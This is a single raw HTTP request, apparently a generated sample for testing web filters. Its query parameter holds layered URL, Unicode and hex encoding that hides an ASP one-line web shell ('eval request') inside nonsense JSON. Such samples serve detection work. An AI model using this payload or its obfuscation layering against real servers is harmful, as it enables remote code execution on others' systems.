HEAD /command/under%20the%20hood?publish=%7B%20%20%22%5Cu0064%5Cu006F%5Cu0077%5Cu006e%5Cu0077%5Cu0061%5Cu0072%5Cu0064%5Cu0073%5Cu0020%5Cu0061%5Cu0072%5Cu0072%5Cu006f%5Cu0077%22%20%0A%3A%7B%0A%0D%22%5Cu0063%5Cu006F%5Cu0073%5Cu0074%5Cu002d%5Cu0065%5Cu0066%5Cu0066%5Cu0069%5Cu0063%5Cu0069%5Cu0065%5Cu006e%5Cu0074%22%3A%09%5B%0A%0918%09%2C%0Dtrue%09%5D%2C%09%0D%22%5Cu0055%5Cu0055%5Cu0049%5Cu0044%5Cu0020%5Cu002F%5Cu0020%5Cu0047%5Cu0055%5Cu0049%5Cu0044%22%09%3A44%09%2C%0D%0D%22%5Cu0065%5Cu006c%5Cu0065%5Cu006D%5Cu0065%5Cu006e%5Cu0074%22%20%0D%3A%20%5B%09%20%5B%09%0A%5B%20%0Dtrue%0A%0A%5D%20%2C%0D%5B%0A%2039%20%2C%09true%0D%5D%5D%2C%0D100%5D%0D%0D%7D%0A%2C%09%22%5Cu006D%5Cu0065%5Cu0074%5Cu0072%5Cu0069%5Cu0063%5Cu0073%22%20%3A%0A%0D%22%5Cu0069%5Cu006e%5Cu0063%5Cu0069%5Cu0064%5Cu0065%5Cu006E%5Cu0074%22%2C%20%0A%22%5Cu0072%5Cu0065%5Cu0073%5Cu0069%5Cu006C%5Cu0069%5Cu0065%5Cu006E%5Cu0063%5Cu0065%22%20%3A%20%0A%22%5Cu0070%5Cu0065%5Cu0072%5Cu006D%5Cu0069%5Cu0073%5Cu0073%5Cu0069%5Cu006F%5Cu006e%22%0A%09%2C%09%0D%22%5Cu006d%5Cu0061%5Cu0074%5Cu0075%5Cu0072%5Cu0065%22%20%3A%22%5Cu0033%5Cu0063%5Cu0032%5Cu0035%5Cu0036%5Cu0035%5Cu0037%5Cu0036%5Cu0036%5Cu0031%5Cu0036%5Cu0063%5Cu0032%5Cu0030%5Cu0037%5Cu0032%5Cu0036%5Cu0035%5Cu0037%5Cu0031%5Cu0037%5Cu0035%5Cu0036%5Cu0035%5Cu0037%5Cu0033%5Cu0037%5Cu0034%5Cu0032%5Cu0038%5Cu0032%5Cu0032%5Cu0037%5Cu0033%5Cu0036%5Cu0032%5Cu0032%5Cu0032%5Cu0032%5Cu0039%5Cu0032%5Cu0035%5Cu0033%5Cu0065%22%2C%0A%0D%22%5Cu0063%5Cu006f%5Cu006E%5Cu0063%5Cu0072%5Cu0065%5Cu0074%5Cu0065%22%0A%3A%0D%7B%0A%22%5Cu0072%5Cu0065%5Cu0067%5Cu0069%5Cu0073%5Cu0074%5Cu0072%5Cu0079%22%3A%20%09%5Bfalse%2C%7B%20%0D%22%5Cu0070%5Cu0072%5Cu006f%5Cu0076%5Cu0069%5Cu0064%5Cu0065%22%09%3A%0965%20%09%7D%20%5D%7D%0A%2C%0D%09%22%5Cu0070%5Cu0065%5Cu0072%5Cu006d%5Cu0061%5Cu006e%5Cu0065%5Cu006E%5Cu0074%22%3A%0Afalse%0A%09%7D HTTP/1.1
Host: example.com
Cache-Control: no-cache
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; SMJB; rv:11.0) like Gecko
Cookie: UUID%20/%20GUID=consumption; elasticity=redacted; backslash=register; SESSIONID=3422b5cab65ab806aeba665224cce3ab77e1caec6fdce16b0cf83512d231afaab1991225cf69353d9eb9fd1d99d0e6a6

